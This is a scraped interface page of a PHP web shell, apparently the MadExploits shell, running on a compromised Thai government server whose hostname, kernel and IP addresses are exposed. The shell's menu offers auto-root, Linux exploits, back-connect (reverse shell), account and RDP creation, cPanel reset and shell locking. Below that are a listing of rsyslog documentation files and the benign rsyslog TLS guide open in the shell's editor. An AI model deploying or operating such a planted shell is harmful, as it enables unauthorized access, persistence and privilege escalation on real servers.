Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
rsyslog-5.8.10 /
[ HOME SHELL ]
Name
Size
Permission
Action
AUTHORS
501
B
-rw-r--r--
COPYING
34.32
KB
-rw-r--r--
COPYING.ASL20
8.92
KB
-rw-r--r--
COPYING.LESSER
7.46
KB
-rw-r--r--
ChangeLog
339.47
KB
-rw-r--r--
NEWS
63
B
-rw-r--r--
README
249
B
-rw-r--r--
bugs.html
1.45
KB
-rw-r--r--
build_from_repo.html
4.35
KB
-rw-r--r--
contributors.html
2.44
KB
-rw-r--r--
debug.html
9.41
KB
-rw-r--r--
dev_queue.html
17.27
KB
-rw-r--r--
droppriv.html
2.9
KB
-rw-r--r--
expression.html
1.15
KB
-rw-r--r--
features.html
8.64
KB
-rw-r--r--
generic_design.html
8.8
KB
-rw-r--r--
gssapi.html
3.55
KB
-rw-r--r--
history.html
8.75
KB
-rw-r--r--
how2help.html
2.43
KB
-rw-r--r--
im3195.html
2.08
KB
-rw-r--r--
imfile.html
7.62
KB
-rw-r--r--
imgssapi.html
2.26
KB
-rw-r--r--
imklog.html
4.36
KB
-rw-r--r--
impstats.html
2.91
KB
-rw-r--r--
imptcp.html
4.14
KB
-rw-r--r--
imrelp.html
2.52
KB
-rw-r--r--
imsolaris.html
1.9
KB
-rw-r--r--
imtcp.html
6.15
KB
-rw-r--r--
imuxsock.html
9.45
KB
-rw-r--r--
index.html
1.62
KB
-rw-r--r--
install.html
10.97
KB
-rw-r--r--
ipv6.html
2.94
KB
-rw-r--r--
licensing.html
3.69
KB
-rw-r--r--
log_rotation_fix_size.html
2.74
KB
-rw-r--r--
manual.html
7.48
KB
-rw-r--r--
mmsnmptrapd.html
4.89
KB
-rw-r--r--
modules.html
5.98
KB
-rw-r--r--
multi_ruleset.html
13.65
KB
-rw-r--r--
netstream.html
1.36
KB
-rw-r--r--
ns_gtls.html
2.78
KB
-rw-r--r--
ns_ptcp.html
911
B
-rw-r--r--
omlibdbi.html
6.57
KB
-rw-r--r--
ommail.html
7.78
KB
-rw-r--r--
ommysql.html
3.95
KB
-rw-r--r--
omoracle.html
6.04
KB
-rw-r--r--
omrelp.html
2.37
KB
-rw-r--r--
omruleset.html
6.93
KB
-rw-r--r--
omsnmp.html
6.97
KB
-rw-r--r--
omstdout.html
1.9
KB
-rw-r--r--
omudpspoof.html
4.23
KB
-rw-r--r--
omuxsock.html
1.88
KB
-rw-r--r--
pmlastmsg.html
3.05
KB
-rw-r--r--
property_replacer.html
17.83
KB
-rw-r--r--
queues.html
27.85
KB
-rw-r--r--
queues_analogy.html
20.11
KB
-rw-r--r--
rainerscript.html
4.19
KB
-rw-r--r--
rsconf1_actionexeconlywhenprev...
2.54
KB
-rw-r--r--
rsconf1_actionresumeinterval.h...
1.47
KB
-rw-r--r--
rsconf1_allowedsender.html
3.6
KB
-rw-r--r--
rsconf1_controlcharacterescape...
1.37
KB
-rw-r--r--
rsconf1_debugprintcfsyslinehan...
989
B
-rw-r--r--
rsconf1_debugprintmodulelist.h...
950
B
-rw-r--r--
rsconf1_debugprinttemplatelist...
956
B
-rw-r--r--
rsconf1_dircreatemode.html
1.04
KB
-rw-r--r--
rsconf1_dirgroup.html
1.06
KB
-rw-r--r--
rsconf1_dirowner.html
1.05
KB
-rw-r--r--
rsconf1_dropmsgswithmaliciousd...
1.31
KB
-rw-r--r--
rsconf1_droptrailinglfonrecept...
1.24
KB
-rw-r--r--
rsconf1_dynafilecachesize.html
2.1
KB
-rw-r--r--
rsconf1_escape8bitcharsonrecei...
2.1
KB
-rw-r--r--
rsconf1_escapecontrolcharacter...
1.92
KB
-rw-r--r--
rsconf1_failonchownfailure.htm...
1.25
KB
-rw-r--r--
rsconf1_filecreatemode.html
2.03
KB
-rw-r--r--
rsconf1_filegroup.html
1.05
KB
-rw-r--r--
rsconf1_fileowner.html
1.05
KB
-rw-r--r--
rsconf1_generateconfiggraph.ht...
7.92
KB
-rw-r--r--
rsconf1_gssforwardservicename....
1.04
KB
-rw-r--r--
rsconf1_gsslistenservicename.h...
905
B
-rw-r--r--
rsconf1_gssmode.html
1.04
KB
-rw-r--r--
rsconf1_includeconfig.html
3.06
KB
-rw-r--r--
rsconf1_mainmsgqueuesize.html
2.15
KB
-rw-r--r--
rsconf1_markmessageperiod.html
1.33
KB
-rw-r--r--
rsconf1_moddir.html
1.2
KB
-rw-r--r--
rsconf1_modload.html
1.49
KB
-rw-r--r--
rsconf1_repeatedmsgreduction.h...
1.3
KB
-rw-r--r--
rsconf1_resetconfigvariables.h...
1.05
KB
-rw-r--r--
rsconf1_rulesetcreatemainqueue...
3.7
KB
-rw-r--r--
rsconf1_rulesetparser.html
5.77
KB
-rw-r--r--
rsconf1_umask.html
1.16
KB
-rw-r--r--
rscript_abnf.html
6.69
KB
-rw-r--r--
rsyslog_conf.html
4.19
KB
-rw-r--r--
rsyslog_conf_actions.html
18
KB
-rw-r--r--
rsyslog_conf_examples.html
7.7
KB
-rw-r--r--
rsyslog_conf_filter.html
14.08
KB
-rw-r--r--
rsyslog_conf_global.html
21.93
KB
-rw-r--r--
rsyslog_conf_modules.html
10.26
KB
-rw-r--r--
rsyslog_conf_nomatch.html
2.69
KB
-rw-r--r--
rsyslog_conf_output.html
4.06
KB
-rw-r--r--
rsyslog_conf_templates.html
10.99
KB
-rw-r--r--
rsyslog_high_database_rate.htm...
8.62
KB
-rw-r--r--
rsyslog_mysql.html
16.02
KB
-rw-r--r--
rsyslog_ng_comparison.html
16.53
KB
-rw-r--r--
rsyslog_packages.html
2.76
KB
-rw-r--r--
rsyslog_pgsql.html
19.75
KB
-rw-r--r--
rsyslog_php_syslog_ng.html
8.54
KB
-rw-r--r--
rsyslog_recording_pri.html
8.19
KB
-rw-r--r--
rsyslog_reliable_forwarding.ht...
8.46
KB
-rw-r--r--
rsyslog_secure_tls.html
7.33
KB
-rw-r--r--
rsyslog_stunnel.html
15.39
KB
-rw-r--r--
rsyslog_tls.html
15.52
KB
-rw-r--r--
syslog_parsing.html
14.03
KB
-rw-r--r--
syslog_protocol.html
12.64
KB
-rw-r--r--
tls_cert_ca.html
7.67
KB
-rw-r--r--
tls_cert_client.html
4.5
KB
-rw-r--r--
tls_cert_errmsgs.html
5.67
KB
-rw-r--r--
tls_cert_machine.html
8.61
KB
-rw-r--r--
tls_cert_scenario.html
3.03
KB
-rw-r--r--
tls_cert_server.html
6.61
KB
-rw-r--r--
tls_cert_summary.html
3.26
KB
-rw-r--r--
tls_cert_udp_relay.html
5.11
KB
-rw-r--r--
troubleshoot.html
11.08
KB
-rw-r--r--
v3compatibility.html
11.19
KB
-rw-r--r--
v4compatibility.html
6.2
KB
-rw-r--r--
v5compatibility.html
2.19
KB
-rw-r--r--
version_naming.html
8.71
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rsyslog_secure_tls.html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html><head><title>TLS-protected syslog: recommended scenario</title> </head> <body> <h1>Encrypting Syslog Traffic with TLS (SSL)</h1> <p><small><i>Written by <a href="http://www.adiscon.com/en/people/rainer-gerhards.php">Rainer Gerhards</a> (2008-06-17)</i></small></p> <ul> <li><a href="rsyslog_secure_tls.html">Overview</a> <li><a href="tls_cert_scenario.html">Sample Scenario</a> <li><a href="tls_cert_ca.html">Setting up the CA</a> <li><a href="tls_cert_machine.html">Generating Machine Certificates</a> <li><a href="tls_cert_server.html">Setting up the Central Server</a> <li><a href="tls_cert_client.html">Setting up syslog Clients</a> <li><a href="tls_cert_udp_relay.html">Setting up the UDP syslog relay</a> <li><a href="tls_cert_summary.html">Wrapping it all up</a> <li><a href="tls_cert_errmsgs.html">Frequently seen Error Messages</a> </ul> <h2>Overview</h2> <p>This document describes a secure way to set up rsyslog TLS. A secure logging environment requires more than just encrypting the transmission channel. This document provides one possible way to create such a secure system. <p>Rsyslog's TLS authentication can be used very flexible and thus supports a wide range of security policies. This section tries to give some advise on a scenario that works well for many environments. However, it may not be suitable for you - please assess you security needs before using the recommendations below. Do not blame us if it doesn't provide what you need ;)</p> <p>Our policy offers these security benefits:</p> <ul> <li>syslog messages are encrypted while traveling on the wire</li> <li>the syslog sender authenticates to the syslog receiver; thus, the receiver knows who is talking to it</li> <li>the syslog receiver authenticates to the syslog sender; thus, the sender can check if it indeed is sending to the expected receiver</li> <li>the mutual authentication prevents man-in-the-middle attacks</li> </ul> <p>Our secrity goals are achived via public/private key security. As such, it is vital that private keys are well protected and not accessible to third parties. <span style="float: left"> <script type="text/javascript"><!-- google_ad_client = "pub-3204610807458280"; /* rsyslog doc inline */ google_ad_slot = "5958614527"; google_ad_width = 125; google_ad_height = 125; //--> </script> <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script> </span> If private keys have become known to third parties, the system does not provide any security at all. Also, our solution bases on X.509 certificates and a (very limited) chain of trust. We have one instance (the CA) that issues all machine certificates. The machine certificate indentifies a particular machine. hile in theory (and practice), there could be several "sub-CA" that issues machine certificates for a specific adminitrative domain, we do not include this in our "simple yet secure" setup. If you intend to use this, rsyslog supports it, but then you need to dig a bit more into the documentation (or use the forum to ask). In general, if you depart from our simple model, you should have good reasons for doing so and know quite well what you are doing - otherwise you may compromise your system security.</p> <p>Please note that security never comes without effort. In the scenario described here, we have limited the effort as much as possible. What remains is some setup work for the central CA, the certificate setup for each machine as well as a few configuration commands that need to be applied to all of them. Proably the most important limiting factor in our setup is that all senders and receivers must support IETF's syslog-transport-tls standard (which is not finalized yet). We use mandatory-to-implement technology, yet you may have trouble finding all required features in some implementations. More often, unfortunately, you will find that an implementation does not support the upcoming IETF standard at all - especially in the "early days" (starting May 2008) when rsyslog is the only implementation of said standard.</p> <p>Fortunately, rsyslog supports allmost every protocol that is out there in the syslog world. So in cases where transport-tls is not available on a sender, we recommend to use rsyslog as the initial relay. In that mode, the not-capabe sender sends to rsyslog via another protocol, which then relays the message via transport-tls to either another interim relay or the final destination (which, of course, must by transport-tls capable). In such a scenario, it is best to try see what the sender support. Maybe it is possible to use industry-standard plain tcp syslog with it. Often you can even combine it with stunnel, which then, too, enables a secure delivery to the first rsyslog relay. If all of that is not possible, you can (and often must...) resort to UDP. Even though this is now lossy and insecure, this is better than not having the ability to listen to that device at all. It may even be reasonale secure if the uncapable sender and the first rsyslog relay communicate via a private channel, e.g. a dedicated network link.</p> <p>One final word of caution: transport-tls protects the connection between the sender and the receiver. It does not necessarily protect against attacks that are present in the message itself. Especially in a relay environment, the message may have been originated from a malicious system, which placed invalid hostnames and/or other content into it. If there is no provisioning against such things, these records may show up in the receivers' repository. -transport-tls does not protect against this (but it may help, properly used). Keep in mind that syslog-transport-tls provides hop-by-hop security. It does not provide end-to-end security and it does not authenticate the message itself (just the last sender).</p> <h3>A very quick Intro</h3> <p>If you'd like to get all information very rapidly, the graphic below contains everything you need to know (from the certificate perspective) in a very condensed manner. It is no surprise if the graphic puzzles you. In this case, <a href="tls_cert_scenario.html">simply read on</a> for full instructions. <p> <img align="center" alt="TLS/SSL protected syslog" src="tls_cert.jpg"> <h3>Feedback requested</h3> <p>I would appreciate feedback on this tutorial. If you have additional ideas, comments or find bugs (I *do* bugs - no way... ;)), please <a href="mailto:rgerhards@adiscon.com">let me know</a>.</p> <h2>Revision History</h2> <ul> <li>2008-06-06 * <a href="http://www.gerhards.net/rainer">Rainer Gerhards</a> * Initial Version created</li> <li>2008-06-18 * <a href="http://www.gerhards.net/rainer">Rainer Gerhards</a> * Greatly enhanced and modularized the doc</li> </ul> <h2>Copyright</h2> <p>Copyright (c) 2008 <a href="http://www.adiscon.com/en/people/rainer-gerhards.php">Rainer Gerhards</a> and <a href="http://www.adiscon.com/en/">Adiscon</a>.</p> <p> Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.2 or any later version published by the Free Software Foundation; with no Invariant Sections, no Front-Cover Texts, and no Back-Cover Texts. A copy of the license can be viewed at <a href="http://www.gnu.org/copyleft/fdl.html">http://www.gnu.org/copyleft/fdl.html</a>.</p> </body></html>
Close